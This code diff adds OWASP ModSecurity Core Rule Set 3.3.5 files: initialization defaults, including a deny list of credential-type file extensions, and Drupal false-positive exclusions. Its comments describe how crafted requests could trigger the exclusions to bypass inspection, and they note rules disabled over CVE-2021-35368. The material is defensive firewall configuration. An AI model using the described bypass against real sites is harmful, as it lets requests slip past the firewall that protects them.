+# The setup.conf can and should be edited by the user, this file
+# is part of the CRS installation and should not be altered.
+#
+
+
+#
+# -=[ Rules Version ]=-
+#
+# Rule version data is added to the "Producer" line of Section H of the Audit log:
+#
+# - Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.1.0.
+#
+# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature
+#
+SecComponentSignature "OWASP_CRS/3.3.5"
+
+#
+# -=[ Default setup values ]=-
+#
+# The CRS checks the tx.crs_setup_version variable to ensure that the setup
+# file is included at the correct time. This detects situations where
+# necessary settings are not defined, for instance if the file
+# inclusion order is incorrect, or if the user has forgotten to
+# include the crs-setup.conf file.
+#
+# If you are upgrading from an earlier version of the CRS and you are
+# getting this error, please make a new copy of the setup template
+# crs-setup.conf.example to crs-setup.conf, and re-apply your policy
+# changes. There have been many changes in settings syntax from CRS2
+# to CRS3, so an old setup file may cause unwanted behavior.
+#
+# If you are not planning to use the crs-setup.conf template, you must
+# manually set the tx.crs_setup_version variable before including
+# the CRS rules/* files.
+#
+# The variable is a numerical representation of the CRS version number.
+# E.g., v3.0.0 is represented as 300.
+#
+
+SecRule &TX:crs_setup_version "@eq 0" \
+ "id:901001,\
+ phase:1,\
+ deny,\
+ status:500,\
+ log,\
+ auditlog,\
+ msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL'"
+
+
+#
+# -=[ Default setup values ]=-
+#
+# Some constructs or individual rules will fail if certain parameters
+# are not set in the setup.conf file. The following rules will catch
+# these cases and assign sane default values.
+#
+
+# Default Inbound Anomaly Threshold Level (rule 900110 in setup.conf)
+SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
+ "id:901100,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.inbound_anomaly_score_threshold=5'"
+
+# Default Outbound Anomaly Threshold Level (rule 900110 in setup.conf)
+SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
+ "id:901110,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.outbound_anomaly_score_threshold=4'"
+
+# Default Paranoia Level (rule 900000 in setup.conf)
+SecRule &TX:paranoia_level "@eq 0" \
+ "id:901120,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.paranoia_level=1'"
+
+# Default Executing Paranoia Level (rule 900000 in setup.conf)
+SecRule &TX:executing_paranoia_level "@eq 0" \
+ "id:901125,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.executing_paranoia_level=%{TX.PARANOIA_LEVEL}'"
+
+# Default Sampling Percentage (rule 900400 in setup.conf)
+SecRule &TX:sampling_percentage "@eq 0" \
+ "id:901130,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.sampling_percentage=100'"
+
+# Default Anomaly Scores (rule 900100 in setup.conf)
+SecRule &TX:critical_anomaly_score "@eq 0" \
+ "id:901140,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.critical_anomaly_score=5'"
+
+SecRule &TX:error_anomaly_score "@eq 0" \
+ "id:901141,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.error_anomaly_score=4'"
+
+SecRule &TX:warning_anomaly_score "@eq 0" \
+ "id:901142,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.warning_anomaly_score=3'"
+
+SecRule &TX:notice_anomaly_score "@eq 0" \
+ "id:901143,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.notice_anomaly_score=2'"
+
+# Default do_reput_block
+SecRule &TX:do_reput_block "@eq 0" \
+ "id:901150,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.do_reput_block=0'"
+
+# Default block duration
+SecRule &TX:reput_block_duration "@eq 0" \
+ "id:901152,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.reput_block_duration=300'"
+
+# Default HTTP policy: allowed_methods (rule 900200)
+SecRule &TX:allowed_methods "@eq 0" \
+ "id:901160,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
+
+# Default HTTP policy: allowed_request_content_type (rule 900220)
+SecRule &TX:allowed_request_content_type "@eq 0" \
+ "id:901162,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'"
+
+# Default HTTP policy: allowed_request_content_type_charset (rule 900270)
+SecRule &TX:allowed_request_content_type_charset "@eq 0"
\
+ "id:901168,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'"
+
+# Default HTTP policy: allowed_http_versions (rule 900230)
+SecRule &TX:allowed_http_versions "@eq 0" \
+ "id:901163,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'"
+
+# Default HTTP policy: restricted_extensions (rule 900240)
+SecRule &TX:restricted_extensions "@eq 0" \
+ "id:901164,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
+
+# Default HTTP policy: restricted_headers (rule 900250)
+SecRule &TX:restricted_headers "@eq 0" \
+ "id:901165,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'"
+
+# Default HTTP policy: static_extensions (rule 900260)
+SecRule &TX:static_extensions "@eq 0" \
+ "id:901166,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'"
+
+# Default enforcing of body processor URLENCODED
+SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \
+ "id:901167,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.enforce_bodyproc_urlencoded=0'"
+
+# Default check for UTF8 encoding validation
+SecRule &TX:crs_validate_utf8_encoding "@eq 0" \
+ "id:901169,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.crs_validate_utf8_encoding=0'"
+
+# Default
monitor_anomaly_score value
+SecRule &TX:monitor_anomaly_score "@eq 0" \
+ "id:901170,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.monitor_anomaly_score=0'"
+
+#
+# -=[ Initialize internal variables ]=-
+#
+
+# Initialize anomaly scoring variables.
+# All _score variables start at 0, and are incremented by the various rules
+# upon detection of a possible attack.
+# sql_error_match is used for shortcutting rules for performance reasons.
+
+SecAction \
+ "id:901200,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.anomaly_score=0',\
+ setvar:'tx.anomaly_score_pl1=0',\
+ setvar:'tx.anomaly_score_pl2=0',\
+ setvar:'tx.anomaly_score_pl3=0',\
+ setvar:'tx.anomaly_score_pl4=0',\
+ setvar:'tx.sql_injection_score=0',\
+ setvar:'tx.xss_score=0',\
+ setvar:'tx.rfi_score=0',\
+ setvar:'tx.lfi_score=0',\
+ setvar:'tx.rce_score=0',\
+ setvar:'tx.php_injection_score=0',\
+ setvar:'tx.http_violation_score=0',\
+ setvar:'tx.session_fixation_score=0',\
+ setvar:'tx.inbound_anomaly_score=0',\
+ setvar:'tx.outbound_anomaly_score=0',\
+ setvar:'tx.outbound_anomaly_score_pl1=0',\
+ setvar:'tx.outbound_anomaly_score_pl2=0',\
+ setvar:'tx.outbound_anomaly_score_pl3=0',\
+ setvar:'tx.outbound_anomaly_score_pl4=0',\
+ setvar:'tx.sql_error_match=0'"
+
+
+#
+# -=[ Initialize collections ]=-
+#
+# Create both Global and IP collections for rules to use.
+# There are some CRS rules that assume that these two collections
+# have already been initiated.
+#
+
+SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \
+ "id:901318,\
+ phase:1,\
+ pass,\
+ t:none,t:sha1,t:hexEncode,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.ua_hash=%{MATCHED_VAR}'"
+
+SecAction \
+ "id:901321,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ initcol:global=global,\
+ initcol:ip=%{remote_addr}_%{tx.ua_hash},\
+ setvar:'tx.real_ip=%{remote_addr}'"
+
+#
+# -=[ Initialize Correct Body Processing ]=-
+#
+# Force request body variable and optionally request body processor
+#
+
+# Force body variable
+SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
+ "id:901340,\
+ phase:1,\
+ pass,\
+ nolog,\
+ noauditlog,\
+ msg:'Enabling body inspection',\
+ ctl:forceRequestBodyVariable=On,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Force body processor URLENCODED
+SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
+ "id:901350,\
+ phase:1,\
+ pass,\
+ t:none,t:urlDecodeUni,\
+ nolog,\
+ noauditlog,\
+ msg:'Enabling forced body inspection for ASCII content',\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
+ "ctl:requestBodyProcessor=URLENCODED"
+
+
+#
+# -=[ Easing In / Sampling Percentage ]=-
+#
+# This is used to send only a limited percentage of requests into the Core
+# Rule Set. The selection is based on TX.sampling_percentage and a pseudo
+# random number calculated below.
+#
+# Use this to ease into a new Core Rules installation with an existing
+# productive service.
+#
+# See
+# https://www.netnea.com/cms/2016/04/26/easing-in-conditional-modsecurity-rule-execution-based-on-pseudo-random-numbers/
+#
+
+#
+# Generate the pseudo random number
+#
+# ATTENTION: This is no cryptographically secure random number. It's just
+# a cheap way to get some random number suitable for sampling.
+#
+# We take the entropy contained in the UNIQUE_ID. We hash that variable and
+# take the first integer numbers out of it.
Theoretically, it is possible
+# there are no integers in a sha1 hash. We make sure we get two
+# integer numbers by taking the last two digits from the DURATION counter
+# (in microseconds).
+# Finally, leading zeros are removed from the two-digit random number.
+#
+
+SecRule TX:sampling_percentage "@eq 100" \
+ "id:901400,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-SAMPLING"
+
+SecRule UNIQUE_ID "@rx ^." \
+ "id:901410,\
+ phase:1,\
+ pass,\
+ t:sha1,t:hexEncode,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'TX.sampling_rnd100=%{MATCHED_VAR}'"
+
+SecRule DURATION "@rx (..)$" \
+ "id:901420,\
+ phase:1,\
+ pass,\
+ capture,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'TX.sampling_rnd100=%{TX.sampling_rnd100}%{TX.1}'"
+
+SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
+ "id:901430,\
+ phase:1,\
+ pass,\
+ capture,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'"
+
+SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \
+ "id:901440,\
+ phase:1,\
+ pass,\
+ capture,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'TX.sampling_rnd100=%{TX.1}'"
+
+
+#
+# Sampling decision
+#
+# If a request is allowed to pass without being checked by the CRS, there is no
+# entry in the audit log (for performance reasons), but an error log entry is
+# being written. If you want to disable the error log entry, then issue the
+# following directive somewhere after the inclusion of the CRS
+# (E.g., RESPONSE-999-EXCEPTIONS.conf).
+#
+# SecRuleUpdateActionById 901450 "nolog"
+#
+
+
+SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \
+ "id:901450,\
+ phase:1,\
+ pass,\
+ log,\
+ noauditlog,\
+ msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\
+ ctl:ruleEngine=Off,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecMarker "END-SAMPLING"
+
+
+#
+# Configuration Plausibility Checks
+#
+
+# Make sure executing paranoia level is not lower than paranoia level
+SecRule TX:executing_paranoia_level "@lt %{tx.paranoia_level}" \
+ "id:901500,\
+ phase:1,\
+ deny,\
+ status:500,\
+ t:none,\
+ log,\
+ msg:'Executing paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\
+ ver:'OWASP_CRS/3.3.5'"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf
new file mode 100644
index 000000000..518300aa6
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf
@@ -0,0 +1,423 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+# These exclusions remedy false positives in a default Drupal install.
+# The exclusions are only active if crs_exclusions_drupal=1 is set.
+# See rule 900130 in crs-setup.conf.example for instructions.
+
+#
+# [ POLICY ]
+#
+# Drupal is a complex application that is hard to secure with the CRS. This set
+# of exclusion rules aims to sanitise the CRS in a way that allows a default
+# Drupal setup to be installed and configured without much hassle as far as
+# ModSecurity and the CRS are concerned.
+#
+# The exclusion rules are fairly straight forward in the sense that they
+# disable CRS on a set of well-known parameter fields that are often the source
+# of false positives / false alarms of the CRS. This includes namely the
+# session cookie, the password fields and article/node bodies.
+#
+# This is based on two assumptions: - You have a basic trust in your
+# authenticated users who are allowed to edit nodes. - Drupal allows html
+# content in nodes and it protects your users from attacks via these fields.
+#
+# If you think these assumptions are wrong or if you would prefer a more
+# careful/secure approach, you can disable the exclusion rules handling of said
+# node body false positives. Do this by placing the following directive in
+# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.
+#
+# SecRuleRemoveById 9001200-9001299
+#
+# This will mean the CRS remain intact for the editing of node bodies.
+#
+# The exclusion rules in this file work without the need to define a Drupal
+# installation path prefix. Instead they look at the URI from the end - or
+# they use regular expressions when targeting dynamic URL. This is all not
+# totally foolproof. In some cases, an advanced attacker might be able to
+# doctor a request in a way that one of these exclusion rules is triggered
+# and the request will bypass all further inspection despite not being a
+# Drupal request at all. These exclusion rules could thus be leveraged to
+# disable the CRS completely. This is why these rules are off by default.
+#
+# The CRS rules covered by this ruleset are the rules with Paranoia Level 1 and
+# 2. If you chose to run Paranoia Level 3 or 4, you will be facing additional
+# false positives which you need to handle yourself.
+#
+# This set of exclusion rules does not cover any additional Drupal modules
+# outside of core.
+#
+# The exclusion rules are based on Drupal 8.1.10.
+#
+# And finally: This set of exclusion rules is in an experimental state. If you
+# encounter false positives with the basic Drupal functionality and they are
+# not covered by this rule file, then please report them. The aim is to be able
+# to install and run Drupal core in a seamless manner protected by
+# ModSecurity / CRS up to the paranoia level 2.
+
+
+SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \
+ "id:9001000,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-DRUPAL-RULE-EXCLUSIONS"
+
+SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \
+ "id:9001001,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-DRUPAL-RULE-EXCLUSIONS"
+
+
+# [ Table of Contents ]
+#
+# 9001100 Session Cookie
+# 9001110 Password
+# 9001120 FREE for use
+# 9001130 FREE for use
+# 9001140 Content and Descriptions
+# 9001150 FREE for use
+# 9001160 Form Token
+# 9001170 Text Formats and Editors
+# 9001180 WYSIWYG/CKEditor Assets and Upload
+# 9001190 FREE for use
+# 9001200 Content and Descriptions
+#
+# The rule id range from 9001200 to 9001999 is reserved for future
+# use (Drupal plugins / modules).
+
+
+# [ Session Cookie ]
+#
+# Giving the session cookie a dynamic name is most unfortunate
+# from a ModSecurity perspective. The rule language does not allow
+# us to disable rules in a granular way for individual cookies with
+# dynamic names. So we need to disable rule causing false positives
+# for all cookies and their names.
+#
+# Rule Exclusion Session Cookie: 942450 SQL Hex Encoding Identified
+#
+SecAction "id:9001100,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES_NAMES,\
+ ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+# [ Password ]
+#
+# Disable the CRS completely for all occurrences of passwords.
+#
+SecRule REQUEST_FILENAME "@endsWith /core/install.php" \
+ "id:9001110,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass1],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass2],\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /user/login" \
+ "id:9001112,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \
+ "id:9001114,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \
+ "id:9001116,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:current_pass,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+# [ Admin Settings (general) ]
+#
+# Disable known false positives for various fields used on admin pages.
+#
+# Rule Exclusion: 920271 Invalid character in request on multiple fields/paths
+# Rule Exclusion: 942430 Restricted SQL Character Anomaly Detection (args)
+# Disabled completely for admin/config pages
+# For the people/accounts page, we disable the CRS completely for a number of
+# freeform text fields.
+#
+SecRule REQUEST_FILENAME "@contains /admin/config/" \
+ "id:9001122,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveById=942430,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \
+ "id:9001124,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveById=920271,\
+ ctl:ruleRemoveById=942440,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_cancel_confirm_body,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_password_reset_body,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_admin_created_body,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_no_approval_required_body,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_pending_approval_body,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_activated_body,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_blocked_body,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_canceled_body,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/single/import" \
+ "id:9001126,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveById=920271,\
+ ctl:ruleRemoveById=942440,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \
+ "id:9001128,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveById=942440,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+#
+# [ Content and Descriptions ]
+#
+# Disable known false positives for field "ids[]".
+#
+# Rule Exclusion: 942130 SQL Injection Attack: SQL Tautology Detected
+#
+SecRule REQUEST_FILENAME "@endsWith /contextual/render" \
+ "id:9001140,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetById=942130;ARGS:ids[],\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+# [ Form Token / Build ID ]
+#
+# Rule Exclusion for form_build_id: 942440 SQL Comment Sequence Detected on ...
+# Rule Exclusion for form_token: 942450 SQL Hex Encoding
+# Rule Exclusion for form_build_id: 942450 SQL Hex Encoding
+#
+# This is applied site-wide.
+#
+SecAction "id:9001160,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetById=942440;ARGS:form_build_id,\
+ ctl:ruleRemoveTargetById=942450;ARGS:form_token,\
+ ctl:ruleRemoveTargetById=942450;ARGS:form_build_id,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+# [ Text Formats and Editors ]
+#
+# Disable the CRS completely for two fields triggering many, many rules
+#
+# Rule Exclusion for two fields: 942440 SQL Comment Sequence Detected
+#
+SecRule REQUEST_FILENAME "@endsWith /admin/config/content/formats/manage/full_html" \
+ "id:9001170,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:editor[settings][toolbar][button_groups],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filters[filter_html][settings][allowed_html],\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+# [ WYSIWYG/CKEditor Assets and Upload ]
+#
+# Disable the unnecessary requestBodyAccess and for binary uploads
+# bigger than an arbitrary limit of 31486341 bytes.
+#
+# Extensive checks make sure these uploads are really legitimate.
+#
+# Rule 9001180 was commented out in 2021 in order to fight CVE-2021-35368.
+#
+#SecRule REQUEST_METHOD "@streq POST" \
+# "id:9001180,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# noauditlog,\
+# ver:'OWASP_CRS/3.3.0',\
+# chain"
+# SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \
+# "chain"
+# SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \
+# "ctl:requestBodyAccess=Off"
+
+# Rule 9001182 was commented out in 2021 in order to fight CVE-2021-35368.
+#
+#SecRule REQUEST_METHOD "@streq POST" \
+# "id:9001182,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# noauditlog,\
+# ver:'OWASP_CRS/3.3.0',\
+# chain"
+# SecRule REQUEST_FILENAME "@rx /admin/content/assets/manage/[0-9]+$" \
+# "chain"
+# SecRule ARGS:destination "@streq admin/content/assets" \
+# "chain"
+# SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \
+# "chain"
+# SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \
+# "ctl:requestBodyAccess=Off"
+
+# Rule 9001184 was commented out in 2021 in order to fight CVE-2021-35368.
+#
+#SecRule REQUEST_METHOD "@streq POST" \
+# "id:9001184,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# noauditlog,\
+# ver:'OWASP_CRS/3.3.0',\
+# chain"
+# SecRule REQUEST_FILENAME "@rx /file/ajax/field_asset_[a-z0-9_]+/[ua]nd/0/form-[a-z0-9A-Z_-]+$" \
+# "chain"
+# SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \
+# "chain"
+# SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \
+# "chain"
+# SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \
+# "ctl:requestBodyAccess=Off"
+
+
+#
+# [ Content and Descriptions ]
+#
+# Disable the CRS completely for node bodies and other free text fields.
+# Other rules are disabled individually.
+#
+# Rule Exclusion for ARGS:uid[0][target_id]: 942410 SQL Injection Attack
+# Rule Exclusion for ARGS:destination: 932110 RCE: Windows Command Inj.
+#
+SecRule REQUEST_FILENAME "@endsWith /node/add/article" \
+ "id:9001200,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\
+ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /node/add/page" \
+ "id:9001202,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\
+ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \
+ "id:9001204,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\
+ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\
+ ctl:ruleRemoveTargetById=932110;ARGS:destination,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /block/add" \
+ "id:9001206,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/basic" \
+ "id:9001208,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:description,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \
+ "id:9001210,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:value,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \
+ "id:9001212,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message[0][value],\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \
+ "id:9001214,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:maintenance_mode_message,\
+ ver:'OWASP_CRS/3.3.5'"
+
+SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \
+ "id:9001216,\
+ phase:2,\
+ pass,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feed_description,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+SecMarker "END-DRUPAL-RULE-EXCLUSIONS"
